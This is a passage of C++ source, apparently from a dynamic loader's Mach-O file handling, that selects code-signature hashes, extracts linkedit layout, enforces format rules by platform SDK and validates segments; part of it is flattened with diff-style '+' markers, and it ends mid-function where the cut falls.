// Note, this has to match the kernel
static const uint32_t hashPriorities[] = {
    CS_HASHTYPE_SHA1,
    CS_HASHTYPE_SHA256_TRUNCATED,
    CS_HASHTYPE_SHA256,
    CS_HASHTYPE_SHA384,
};

// Rank of a code directory's hash type per hashPriorities (0 = unsupported).
static unsigned int hash_rank(const CS_CodeDirectory *cd)
{
    uint32_t type = cd->hashType;
    for (uint32_t n = 0; n < sizeof(hashPriorities) / sizeof(hashPriorities[0]); ++n) {
        if (hashPriorities[n] == type)
            return n + 1;
    }

    /* not supported */
    return 0;
}

// Note, this does NOT match the kernel.
// On watchOS, in main executables, we will record all cd hashes then make sure
// one of the ones we record matches the kernel.
// This list is only for dylibs where we embed the cd hash in the closure instead of the
// mod time and inode
// This is sorted so that we choose sha1 first when checking dylibs
static const uint32_t hashPriorities_watchOS_dylibs[] = {
    CS_HASHTYPE_SHA256_TRUNCATED,
    CS_HASHTYPE_SHA256,
    CS_HASHTYPE_SHA384,
    CS_HASHTYPE_SHA1
};

// Rank per hashPriorities_watchOS_dylibs (0 = unsupported).
static unsigned int hash_rank_watchOS_dylibs(const CS_CodeDirectory *cd)
{
    uint32_t type = cd->hashType;
    for (uint32_t n = 0; n < sizeof(hashPriorities_watchOS_dylibs) / sizeof(hashPriorities_watchOS_dylibs[0]); ++n) {
        if (hashPriorities_watchOS_dylibs[n] == type)
            return n + 1;
    }

    /* not supported */
    return 0;
}

// This calls the callback for all code directories required for a given platform/binary combination.
// On watchOS main executables this is all cd hashes.
// On watchOS dylibs this is only the single cd hash we need (by rank defined by dyld, not the kernel).
// On all other platforms this always returns a single best cd hash (ranked to match the kernel).
// Note the callback parameter is really a CS_CodeDirectory.
void MachOFile::forEachCodeDirectoryBlob(const void* codeSigStart, size_t codeSignLen,
                                         void (^callback)(const void* cd)) const
{
    // verify min length of overall code signature
    if ( codeSignLen < sizeof(CS_SuperBlob) )
        return;

    // verify magic at start
    const CS_SuperBlob* codeSuperBlob = (CS_SuperBlob*)codeSigStart;
    if ( codeSuperBlob->magic != htonl(CSMAGIC_EMBEDDED_SIGNATURE) )
        return;

    // verify count of sub-blobs not too large
    uint32_t subBlobCount = htonl(codeSuperBlob->count);
    if ( (codeSignLen-sizeof(CS_SuperBlob))/sizeof(CS_BlobIndex) < subBlobCount )
        return;

    // Note: The kernel sometimes chooses sha1 on watchOS, and sometimes sha256.
    // Embed all of them so that we just need to match any of them
    const bool isWatchOS = this->builtForPlatform(Platform::watchOS);
    const bool isMainExecutable = this->isMainExecutable();
    auto hashRankFn = isWatchOS ? &hash_rank_watchOS_dylibs : &hash_rank;

    // walk each sub blob, looking at ones with type CSSLOT_CODEDIRECTORY
    const CS_CodeDirectory* bestCd = nullptr;
    for (uint32_t i=0; i < subBlobCount; ++i) {
        if ( codeSuperBlob->index[i].type == htonl(CSSLOT_CODEDIRECTORY) ) {
            // Ok, this is the regular code directory
        } else if ( codeSuperBlob->index[i].type >= htonl(CSSLOT_ALTERNATE_CODEDIRECTORIES) && codeSuperBlob->index[i].type <= htonl(CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT)) {
            // Ok, this is the alternative code directory
        } else {
            continue;
        }
        uint32_t cdOffset = htonl(codeSuperBlob->index[i].offset);
        // verify offset is not out of range
        if ( cdOffset > (codeSignLen - sizeof(CS_CodeDirectory)) )
            continue;
        const CS_CodeDirectory* cd = (CS_CodeDirectory*)((uint8_t*)codeSuperBlob + cdOffset);
        uint32_t cdLength = htonl(cd->length);
        // verify code directory length not out of range
        if ( cdLength > (codeSignLen - cdOffset) )
            continue;

        // The watch main executable wants to know about all cd hashes
        if ( isWatchOS && isMainExecutable ) {
            callback(cd);
            continue;
        }

        if ( cd->magic == htonl(CSMAGIC_CODEDIRECTORY) ) {
            if ( !bestCd || (hashRankFn(cd) > hashRankFn(bestCd)) )
                bestCd = cd;
        }
    }

    // Note this callback won't happen on watchOS as that one was done in the loop
    if ( bestCd != nullptr )
        callback(bestCd);
}

// Computes the 20-byte cd-hash of each relevant code directory (SHA1 output,
// or the first 20 bytes of SHA256/SHA384) and passes it to the callback.
void MachOFile::forEachCDHashOfCodeSignature(const void* codeSigStart, size_t codeSignLen,
                                             void (^callback)(const uint8_t cdHash[20])) const
{
    forEachCodeDirectoryBlob(codeSigStart, codeSignLen, ^(const void *cdBuffer) {
        const CS_CodeDirectory* cd = (const CS_CodeDirectory*)cdBuffer;
        uint32_t cdLength = htonl(cd->length);
        uint8_t cdHash[20];
        if ( cd->hashType == CS_HASHTYPE_SHA384 ) {
            uint8_t digest[CCSHA384_OUTPUT_SIZE];
            const struct ccdigest_info* di = ccsha384_di();
            ccdigest_di_decl(di, tempBuf); // declares tempBuf array in stack
            ccdigest_init(di, tempBuf);
            ccdigest_update(di, tempBuf, cdLength, cd);
            ccdigest_final(di, tempBuf, digest);
            ccdigest_di_clear(di, tempBuf);
            // cd-hash of sigs that use SHA384 is the first 20 bytes of the SHA384 of the code digest
            memcpy(cdHash, digest, 20);
            callback(cdHash);
            return;
        }
        else if ( (cd->hashType == CS_HASHTYPE_SHA256) || (cd->hashType == CS_HASHTYPE_SHA256_TRUNCATED) ) {
            uint8_t digest[CCSHA256_OUTPUT_SIZE];
            const struct ccdigest_info* di = ccsha256_di();
            ccdigest_di_decl(di, tempBuf); // declares tempBuf array in stack
            ccdigest_init(di, tempBuf);
            ccdigest_update(di, tempBuf, cdLength, cd);
            ccdigest_final(di, tempBuf, digest);
            ccdigest_di_clear(di, tempBuf);
            // cd-hash of sigs that use SHA256 is the first 20 bytes of the SHA256 of the code digest
            memcpy(cdHash, digest, 20);
            callback(cdHash);
            return;
        }
        else if ( cd->hashType == CS_HASHTYPE_SHA1 ) {
            // compute hash directly into return buffer
            const struct ccdigest_info* di = ccsha1_di();
            ccdigest_di_decl(di, tempBuf); // declares tempBuf array in stack
            ccdigest_init(di, tempBuf);
            ccdigest_update(di, tempBuf, cdLength, cd);
            ccdigest_final(di, tempBuf, cdHash);
            ccdigest_di_clear(di, tempBuf);
            callback(cdHash);
            return;
        }
    });
}
#endif // !TARGET_OS_EXCLAVEKIT

// These are mangled symbols for all the variants of operator new and delete
// which a main executable can define (non-weak) and override the
// weak-def implementation in the OS.
static const char* const sTreatAsWeak[] = {
    "__Znwm", "__ZnwmRKSt9nothrow_t",
    "__Znam", "__ZnamRKSt9nothrow_t",
    "__ZdlPv", "__ZdlPvRKSt9nothrow_t", "__ZdlPvm",
    "__ZdaPv", "__ZdaPvRKSt9nothrow_t", "__ZdaPvm",
    "__ZnwmSt11align_val_t", "__ZnwmSt11align_val_tRKSt9nothrow_t",
    "__ZnamSt11align_val_t", "__ZnamSt11align_val_tRKSt9nothrow_t",
    "__ZdlPvSt11align_val_t", "__ZdlPvSt11align_val_tRKSt9nothrow_t", "__ZdlPvmSt11align_val_t",
    "__ZdaPvSt11align_val_t", "__ZdaPvSt11align_val_tRKSt9nothrow_t", "__ZdaPvmSt11align_val_t",
    "__ZnwmSt19__type_descriptor_t", "__ZnamSt19__type_descriptor_t"
};

// Calls the handler once per mangled operator new/delete symbol in sTreatAsWeak.
void MachOFile::forEachTreatAsWeakDef(void (^handler)(const char* symbolName))
{
    for (const char* sym : sTreatAsWeak)
        handler(sym);
}

// Default: all metadata fields zeroed (no auth, no high8).
MachOFile::PointerMetaData::PointerMetaData()
{
    this->diversity           = 0;
    this->high8               = 0;
    this->authenticated       = 0;
    this->key                 = 0;
    this->usesAddrDiversity   = 0;
}

// Extracts pointer metadata (PAC auth info or high8 bits) from an on-disk
// chained fixup, interpreted according to pointer_format.
MachOFile::PointerMetaData::PointerMetaData(const ChainedFixupPointerOnDisk* fixupLoc, uint16_t pointer_format)
{
    this->diversity           = 0;
    this->high8               = 0;
    this->authenticated       = 0;
    this->key                 = 0;
    this->usesAddrDiversity   = 0;
    switch ( pointer_format ) {
        case DYLD_CHAINED_PTR_ARM64E:
        case DYLD_CHAINED_PTR_ARM64E_KERNEL:
        case DYLD_CHAINED_PTR_ARM64E_USERLAND:
        case DYLD_CHAINED_PTR_ARM64E_FIRMWARE:
        case DYLD_CHAINED_PTR_ARM64E_USERLAND24:
            this->authenticated = fixupLoc->arm64e.authRebase.auth;
            if ( this->authenticated ) {
                this->key               = fixupLoc->arm64e.authRebase.key;
                this->usesAddrDiversity = fixupLoc->arm64e.authRebase.addrDiv;
                this->diversity         = fixupLoc->arm64e.authRebase.diversity;
            }
            else if ( fixupLoc->arm64e.bind.bind == 0 ) {
                this->high8             = fixupLoc->arm64e.rebase.high8;
            }
            break;
        case DYLD_CHAINED_PTR_64:
        case DYLD_CHAINED_PTR_64_OFFSET:
            if ( fixupLoc->generic64.bind.bind == 0 )
                this->high8             = fixupLoc->generic64.rebase.high8;
            break;
    }
}

// Field-wise equality of all five metadata fields.
bool MachOFile::PointerMetaData::operator==(const PointerMetaData& other) const
{
    return (this->diversity == other.diversity)
        && (this->high8 == other.high8)
        && (this->authenticated == other.authenticated)
        && (this->key == other.key)
        && (this->usesAddrDiversity == other.usesAddrDiversity);
}

#if !SUPPORT_VM_LAYOUT
// Fills `layout` with the LINKEDIT table locations from LC_SYMTAB/LC_DYSYMTAB
// (and further commands past this chunk), using raw file offsets.
bool MachOFile::getLinkeditLayout(Diagnostics& diag, mach_o::LinkeditLayout& layout) const
{
    // Note, in file layout all linkedit offsets are just file offsets.
    // It is essential no-one calls this on a MachOLoaded or MachOAnalyzer

    // FIXME: Other load commands
    this->forEachLoadCommand(diag, ^(const load_command *cmd, bool &stop) {
        switch ( cmd->cmd ) {
            case LC_SYMTAB: {
                const symtab_command* symTabCmd = (const symtab_command*)cmd;

                // Record that we found a LC_SYMTAB
                layout.hasSymTab = true;

                // NList
                uint64_t nlistEntrySize  = this->is64() ? sizeof(struct nlist_64) : sizeof(struct nlist);
                layout.symbolTable.fileOffset       = symTabCmd->symoff;
                layout.symbolTable.buffer           = (uint8_t*)this + symTabCmd->symoff;
                layout.symbolTable.bufferSize       = (uint32_t)(symTabCmd->nsyms * nlistEntrySize);
                layout.symbolTable.entryCount       = symTabCmd->nsyms;
                layout.symbolTable.hasLinkedit      = true;

                // Symbol strings
                layout.symbolStrings.fileOffset     = symTabCmd->stroff;
                layout.symbolStrings.buffer         = (uint8_t*)this + symTabCmd->stroff;
                layout.symbolStrings.bufferSize     = symTabCmd->strsize;
                layout.symbolStrings.hasLinkedit    = true;
                break;
            }
            case LC_DYSYMTAB: {
                const dysymtab_command* dynSymTabCmd = (const dysymtab_command*)cmd;

                // Record that we found a LC_DYSYMTAB
                layout.hasDynSymTab = true;

                // Local relocs
                layout.localRelocs.fileOffset           = dynSymTabCmd->locreloff;
                layout.localRelocs.buffer               = (uint8_t*)this + dynSymTabCmd->locreloff;
                layout.localRelocs.bufferSize           = 0;        // Use entryCount instead
                layout.localRelocs.entryIndex           = 0;        // Use buffer instead
                layout.localRelocs.entryCount           = dynSymTabCmd->nlocrel;
                layout.localRelocs.hasLinkedit          = true;

                // Extern relocs
                layout.externRelocs.fileOffset          = dynSymTabCmd->extreloff;
                layout.externRelocs.buffer              = (uint8_t*)this + dynSymTabCmd->extreloff;
                layout.externRelocs.bufferSize          = 0;        // Use entryCount instead
                layout.externRelocs.entryIndex          = 0;        // Use buffer instead
                layout.externRelocs.entryCount          = dynSymTabCmd->nextrel;
                layout.externRelocs.hasLinkedit         = true;

                // Indirect symbol table
                layout.indirectSymbolTable.fileOffset   = dynSymTabCmd->indirectsymoff;
                layout.indirectSymbolTable.buffer       = (uint8_t*)this + dynSymTabCmd->indirectsymoff;
                layout.indirectSymbolTable.bufferSize   = 0;        // Use entryCount instead
                layout.indirectSymbolTable.entryIndex   = 0;        // Use buffer instead
                layout.indirectSymbolTable.entryCount   = dynSymTabCmd->nindirectsyms;
                layout.indirectSymbolTable.hasLinkedit  = true;

                // Locals
                layout.localSymbolTable.fileOffset      = 0;        // unused
                layout.localSymbolTable.buffer          = nullptr;  // Use entryIndex instead
                layout.localSymbolTable.bufferSize      = 0;        // Use entryCount instead
                layout.localSymbolTable.entryIndex      = dynSymTabCmd->ilocalsym;
                layout.localSymbolTable.entryCount      = dynSymTabCmd->nlocalsym;
                layout.localSymbolTable.hasLinkedit     = true;

                // Globals
                layout.globalSymbolTable.fileOffset     = 0;        // unused
                layout.globalSymbolTable.buffer         = nullptr;  // Use entryIndex instead
                layout.globalSymbolTable.bufferSize     = 0;        // Use entryCount instead
                layout.globalSymbolTable.entryIndex     = dynSymTabCmd->iextdefsym;
                layout.globalSymbolTable.entryCount     = dynSymTabCmd->nextdefsym;
                layout.globalSymbolTable.hasLinkedit    = true;

                // Imports
                layout.undefSymbolTable.fileOffset      = 0;        // unused
                layout.undefSymbolTable.buffer          = nullptr;  // Use entryIndex instead
                layout.undefSymbolTable.bufferSize      = 0;        // Use entryCount instead
                layout.undefSymbolTable.entryIndex      = dynSymTabCmd->iundefsym;
                layout.undefSymbolTable.entryCount      = dynSymTabCmd->nundefsym;
                layout.undefSymbolTable.hasLinkedit     = true;
                break;
            }
            case LC_DYLD_INFO:
            case
LC_DYLD_INFO_ONLY: { + const dyld_info_command* linkeditCmd = (const dyld_info_command*)cmd; + + // Record what kind of DYLD_INFO we found + layout.dyldInfoCmd = cmd->cmd; + + // Rebase + layout.rebaseOpcodes.fileOffset = linkeditCmd->rebase_off; + layout.rebaseOpcodes.buffer = (uint8_t*)this + linkeditCmd->rebase_off; + layout.rebaseOpcodes.bufferSize = linkeditCmd->rebase_size; + layout.rebaseOpcodes.hasLinkedit = true; + + // Bind + layout.regularBindOpcodes.fileOffset = linkeditCmd->bind_off; + layout.regularBindOpcodes.buffer = (uint8_t*)this + linkeditCmd->bind_off; + layout.regularBindOpcodes.bufferSize = linkeditCmd->bind_size; + layout.regularBindOpcodes.hasLinkedit = true; + + // Lazy bind + layout.lazyBindOpcodes.fileOffset = linkeditCmd->lazy_bind_off; + layout.lazyBindOpcodes.buffer = (uint8_t*)this + linkeditCmd->lazy_bind_off; + layout.lazyBindOpcodes.bufferSize = linkeditCmd->lazy_bind_size; + layout.lazyBindOpcodes.hasLinkedit = true; + + // Weak bind + layout.weakBindOpcodes.fileOffset = linkeditCmd->weak_bind_off; + layout.weakBindOpcodes.buffer = (uint8_t*)this + linkeditCmd->weak_bind_off; + layout.weakBindOpcodes.bufferSize = linkeditCmd->weak_bind_size; + layout.weakBindOpcodes.hasLinkedit = true; + + // Export trie + layout.exportsTrie.fileOffset = linkeditCmd->export_off; + layout.exportsTrie.buffer = (uint8_t*)this + linkeditCmd->export_off; + layout.exportsTrie.bufferSize = linkeditCmd->export_size; + layout.exportsTrie.hasLinkedit = true; + break; + } + case LC_DYLD_CHAINED_FIXUPS: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.chainedFixups.fileOffset = linkeditCmd->dataoff; + layout.chainedFixups.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.chainedFixups.bufferSize = linkeditCmd->datasize; + layout.chainedFixups.entryCount = 0; // Not needed here + layout.chainedFixups.hasLinkedit = true; + layout.chainedFixups.cmd = linkeditCmd; + break; + } + case LC_DYLD_EXPORTS_TRIE: { + 
const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.exportsTrie.fileOffset = linkeditCmd->dataoff; + layout.exportsTrie.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.exportsTrie.bufferSize = linkeditCmd->datasize; + layout.exportsTrie.entryCount = 0; // Not needed here + layout.exportsTrie.hasLinkedit = true; + break; + } + case LC_SEGMENT_SPLIT_INFO: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.splitSegInfo.fileOffset = linkeditCmd->dataoff; + layout.splitSegInfo.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.splitSegInfo.bufferSize = linkeditCmd->datasize; + layout.splitSegInfo.entryCount = 0; // Not needed here + layout.splitSegInfo.hasLinkedit = true; + break; + } + case LC_FUNCTION_STARTS: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.functionStarts.fileOffset = linkeditCmd->dataoff; + layout.functionStarts.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.functionStarts.bufferSize = linkeditCmd->datasize; + layout.functionStarts.entryCount = 0; // Not needed here + layout.functionStarts.hasLinkedit = true; + break; + } + case LC_DATA_IN_CODE: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.dataInCode.fileOffset = linkeditCmd->dataoff; + layout.dataInCode.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.dataInCode.bufferSize = linkeditCmd->datasize; + layout.dataInCode.entryCount = 0; // Not needed here + layout.dataInCode.hasLinkedit = true; + break; + } + case LC_CODE_SIGNATURE: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.codeSignature.fileOffset = linkeditCmd->dataoff; + layout.codeSignature.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.codeSignature.bufferSize = linkeditCmd->datasize; + layout.codeSignature.entryCount = 0; // Not needed here + layout.codeSignature.hasLinkedit = true; + 
break; + } + } + }); + + return true; +} + +void MachOFile::withFileLayout(Diagnostics &diag, void (^callback)(const mach_o::Layout &layout)) const +{ + // Use the fixups from the source dylib + mach_o::LinkeditLayout linkedit; + if ( !this->getLinkeditLayout(diag, linkedit) ) { + diag.error("Couldn't get dylib layout"); + return; + } + + uint32_t numSegments = this->segmentCount(); + BLOCK_ACCCESSIBLE_ARRAY(mach_o::SegmentLayout, segmentLayout, numSegments); + this->forEachSegment(^(const SegmentInfo &info, bool &stop) { + mach_o::SegmentLayout segment; + segment.vmAddr = info.vmAddr; + segment.vmSize = info.vmSize; + segment.fileOffset = info.fileOffset; + segment.fileSize = info.fileSize; + segment.buffer = (uint8_t*)this + info.fileOffset; + segment.protections = info.protections; + + segment.kind = mach_o::SegmentLayout::Kind::unknown; + if ( !strcmp(info.segName, "__TEXT") ) { + segment.kind = mach_o::SegmentLayout::Kind::text; + } else if ( !strcmp(info.segName, "__LINKEDIT") ) { + segment.kind = mach_o::SegmentLayout::Kind::linkedit; + } + + segmentLayout[info.segIndex] = segment; + }); + + mach_o::Layout layout(this, { &segmentLayout[0], &segmentLayout[numSegments] }, linkedit); + callback(layout); +} +#endif // !SUPPORT_VM_LAYOUT + +bool MachOFile::hasObjCMessageReferences() const { + + __block bool foundSection = false; + forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) { + if ( strncmp(sectInfo.segInfo.segName, "__DATA", 6) != 0 ) + return; + if ( strcmp(sectInfo.sectName, "__objc_msgrefs") != 0 ) + return; + foundSection = true; + stop = true; + }); + return foundSection; +} + +uint32_t MachOFile::loadCommandsFreeSpace() const +{ + __block uint32_t firstSectionFileOffset = 0; + __block uint32_t firstSegmentFileOffset = 0; + forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) { + firstSectionFileOffset = sectInfo.sectFileOffset; + firstSegmentFileOffset = 
(uint32_t)sectInfo.segInfo.fileOffset; + stop = true; + }); + + uint32_t headerSize = (this->magic == MH_MAGIC_64) ? sizeof(mach_header_64) : sizeof(mach_header); + uint32_t existSpaceUsed = this->sizeofcmds + headerSize; + return firstSectionFileOffset - firstSegmentFileOffset - existSpaceUsed; +} + +bool MachOFile::findObjCDataSection(const char *sectionName, uint64_t& sectionRuntimeOffset, uint64_t& sectionSize) const +{ + uint64_t baseAddress = preferredLoadAddress(); + + __block bool foundSection = false; + forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) { + if ( (strcmp(sectInfo.segInfo.segName, "__DATA") != 0) && + (strcmp(sectInfo.segInfo.segName, "__DATA_CONST") != 0) && + (strcmp(sectInfo.segInfo.segName, "__DATA_DIRTY") != 0) ) + return; + if ( strcmp(sectInfo.sectName, sectionName) != 0 ) + return; + foundSection = true; + sectionRuntimeOffset = sectInfo.sectAddr - baseAddress; + sectionSize = sectInfo.sectSize; + stop = true; + }); + return foundSection; +} + +bool MachOFile::enforceFormat(Malformed kind) const +{ + // TODO: Add a mapping from generic releases to platform versions +#if BUILDING_DYLDINFO || BUILDING_APP_CACHE_UTIL || BUILDING_RUN_STATIC + // HACK: If we are the kernel, we have a different format to enforce + if ( isFileSet() ) { + bool result = false; + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::linkeditAlignment: + case Malformed::dyldInfoAndlocalRelocs: + result = true; + break; + case Malformed::segmentOrder: + // The aux KC has __DATA first + result = false; + break; + case Malformed::linkeditPermissions: + case Malformed::executableData: + case Malformed::writableData: + case Malformed::codeSigAlignment: + case Malformed::sectionsAddrRangeWithinSegment: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + result = true; + break; + case Malformed::noLinkedDylibs: + case Malformed::textPermissions: + // The kernel has its own __TEXT_EXEC for 
executable memory + result = false; + break; + case Malformed::noUUID: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + case Malformed::sdkOnOrAfter2022: + result = true; + break; + } + return result; + } + + if ( isStaticExecutable() ) { + bool result = false; + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::linkeditAlignment: + case Malformed::dyldInfoAndlocalRelocs: + result = true; + break; + case Malformed::segmentOrder: + case Malformed::textPermissions: + result = false; + break; + case Malformed::linkeditPermissions: + case Malformed::executableData: + case Malformed::codeSigAlignment: + case Malformed::sectionsAddrRangeWithinSegment: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + result = true; + break; + case Malformed::noLinkedDylibs: + case Malformed::writableData: + case Malformed::noUUID: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + case Malformed::sdkOnOrAfter2022: + // The kernel has __DATA_CONST marked as r/o + result = false; + break; + } + return result; + } + +#endif + + __block bool result = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + switch (platform) { + case Platform::macOS: + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::linkeditAlignment: + case Malformed::dyldInfoAndlocalRelocs: + // enforce these checks on new binaries only + if (sdk >= 0x000A0E00) // macOS 10.14 + result = true; + break; + case Malformed::segmentOrder: + case Malformed::linkeditPermissions: + case Malformed::textPermissions: + case Malformed::executableData: + case Malformed::writableData: + case Malformed::codeSigAlignment: + // enforce these checks on new binaries only + if (sdk >= 0x000A0F00) // macOS 10.15 + result = true; + break; + case Malformed::sectionsAddrRangeWithinSegment: + // enforce these checks on new binaries only + if (sdk >= 0x000A1000) // macOS 10.16 + result = true; + 
break; + case Malformed::noLinkedDylibs: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + // enforce these checks on new binaries only + if (sdk >= 0x000D0000) // macOS 13.0 + result = true; + break; + case Malformed::noUUID: + case Malformed::sdkOnOrAfter2022: + if (sdk >= 0x000E0000) // macOS 14.0 FIXME + result = true; + break; + } + break; + case Platform::iOS: + case Platform::tvOS: + case Platform::iOSMac: + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::dyldInfoAndlocalRelocs: + case Malformed::textPermissions: + case Malformed::executableData: + case Malformed::writableData: + result = true; + break; + case Malformed::linkeditAlignment: + case Malformed::segmentOrder: + case Malformed::linkeditPermissions: + case Malformed::codeSigAlignment: + // enforce these checks on new binaries only + if (sdk >= 0x000D0000) // iOS 13 + result = true; + break; + case Malformed::sectionsAddrRangeWithinSegment: + // enforce these checks on new binaries only + if (sdk >= 0x000E0000) // iOS 14 + result = true; + break; + case Malformed::noLinkedDylibs: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + // enforce these checks on new binaries only + if (sdk >= 0x00100000) // iOS 16 + result = true; + break; + case Malformed::noUUID: + case Malformed::sdkOnOrAfter2022: + if (sdk >= 0x00110000) // iOS 17.0 FIXME + result = true; + break; + } + break; + case Platform::watchOS: + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::dyldInfoAndlocalRelocs: + case Malformed::textPermissions: + case Malformed::executableData: + case Malformed::writableData: + result = true; + break; + case Malformed::linkeditAlignment: + case Malformed::segmentOrder: + case Malformed::linkeditPermissions: + case Malformed::codeSigAlignment: + case 
Malformed::sectionsAddrRangeWithinSegment: + case Malformed::noLinkedDylibs: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + // enforce these checks on new binaries only + if (sdk >= 0x00090000) // watchOS 9 + result = true; + break; + case Malformed::noUUID: + case Malformed::sdkOnOrAfter2022: + if (sdk >= 0x000A0000) // watchOS 10 FIXME + result = true; + break; + } + break; + case Platform::driverKit: + result = true; + break; + default: + result = true; + break; + } + }); + // if binary is so old, there is no platform info, don't enforce malformed errors + return result; +} + +bool MachOFile::validSegments(Diagnostics& diag, const char* path, size_t fileLen) const +{ + // check segment load command size + __block bool badSegmentLoadCommand = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* seg = (segment_command_64*)cmd; + int32_t sectionsSpace = cmd->cmdsize - sizeof(segment_command_64); + if ( sectionsSpace < 0 ) { + diag.error("in '%s' load command size too small for LC_SEGMENT_64", path); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (sectionsSpace % sizeof(section_64)) != 0 ) { + diag.error("in '%s' segment load command size 0x%X will not fit whole number of sections", path, cmd->cmdsize); + badSegmentLoadCommand = true; + stop = true; + } + else if ( sectionsSpace != (int32_t)(seg->nsects * sizeof(section_64)) ) { + diag.error("in '%s' load command size 0x%X does not match nsects %d", path, cmd->cmdsize, seg->nsects); + badSegmentLoadCommand = true; + stop = true; + } + else if ( greaterThanAddOrOverflow(seg->fileoff, seg->filesize, fileLen) ) { + diag.error("in '%s' segment load command content extends beyond end of file", path); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (seg->filesize > seg->vmsize) && ((seg->vmsize != 
0) || ((seg->flags & SG_NORELOC) == 0)) ) { + // dyld should support non-allocatable __LLVM segment + diag.error("in '%s' segment '%s' filesize exceeds vmsize", path, seg->segname); + badSegmentLoadCommand = true; + stop = true; + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* seg = (segment_command*)cmd; + int32_t sectionsSpace = cmd->cmdsize - sizeof(segment_command); + if ( sectionsSpace < 0 ) { + diag.error("in '%s' load command size too small for LC_SEGMENT", path); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (sectionsSpace % sizeof(section)) != 0 ) { + diag.error("in '%s' segment load command size 0x%X will not fit whole number of sections", path, cmd->cmdsize); + badSegmentLoadCommand = true; + stop = true; + } + else if ( sectionsSpace != (int32_t)(seg->nsects * sizeof(section)) ) { + diag.error("in '%s' load command size 0x%X does not match nsects %d", path, cmd->cmdsize, seg->nsects); + badSegmentLoadCommand = true; + stop = true; + } + else if ( (seg->filesize > seg->vmsize) && ((seg->vmsize != 0) || ((seg->flags & SG_NORELOC) == 0)) ) { + // dyld should support non-allocatable __LLVM segment + diag.error("in '%s' segment '%s' filesize exceeds vmsize", path, seg->segname); + badSegmentLoadCommand = true; + stop = true; + } + } + }); + if ( badSegmentLoadCommand ) + return false; + + // check mapping permissions of segments + __block bool badPermissions = false; + __block bool badSize = false; + __block bool hasTEXT = false; + __block bool hasLINKEDIT = false; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( strcmp(info.segName, "__TEXT") == 0 ) { + if ( (info.protections != (VM_PROT_READ|VM_PROT_EXECUTE)) && enforceFormat(Malformed::textPermissions) ) { + diag.error("in '%s' __TEXT segment permissions is not 'r-x'", path); + badPermissions = true; + stop = true; + } + hasTEXT = true; + } + else if ( strcmp(info.segName, "__LINKEDIT") == 0 ) { + if ( (info.protections != VM_PROT_READ) && 
enforceFormat(Malformed::linkeditPermissions) ) { + diag.error("in '%s' __LINKEDIT segment permissions is not 'r--'", path); + badPermissions = true; + stop = true; + } + hasLINKEDIT = true; + } + else if ( (info.protections & 0xFFFFFFF8) != 0 ) { + diag.error("in '%s' %s segment permissions has invalid bits set", path, info.segName); + badPermissions = true; + stop = true; + } + if ( greaterThanAddOrOverflow(info.fileOffset, info.fileSize, fileLen) ) { + diag.error("in '%s' %s segment content extends beyond end of file", path, info.segName); + badSize = true; + stop = true; + } + if ( is64() ) { + if ( info.vmAddr+info.vmSize < info.vmAddr ) { + diag.error("in '%s' %s segment vm range wraps", path, info.segName); + badSize = true; + stop = true; + } + } + else { + if ( (uint32_t)(info.vmAddr+info.vmSize) < (uint32_t)(info.vmAddr) ) { + diag.error("in '%s' %s segment vm range wraps", path, info.segName); + badSize = true; + stop = true; + } + } + }); + if ( badPermissions || badSize ) + return false; + if ( !hasTEXT ) { + diag.error("in '%s' missing __TEXT segment", path); + return false; + } + if ( !hasLINKEDIT && !this->isPreload() ) { + diag.error("in '%s' missing __LINKEDIT segment", path); + return false; + } + + // check for overlapping segments + __block bool badSegments = false; + forEachSegment(^(const SegmentInfo& info1, bool& stop1) { + uint64_t seg1vmEnd = info1.vmAddr + info1.vmSize; + uint64_t seg1FileEnd = info1.fileOffset + info1.fileSize; + forEachSegment(^(const SegmentInfo& info2, bool& stop2) { + if ( info1.segIndex == info2.segIndex ) + return; + uint64_t seg2vmEnd = info2.vmAddr + info2.vmSize; + uint64_t seg2FileEnd = info2.fileOffset + info2.fileSize; + if ( ((info2.vmAddr <= info1.vmAddr) && (seg2vmEnd > info1.vmAddr) && (seg1vmEnd > info1.vmAddr )) || ((info2.vmAddr >= info1.vmAddr ) && (info2.vmAddr < 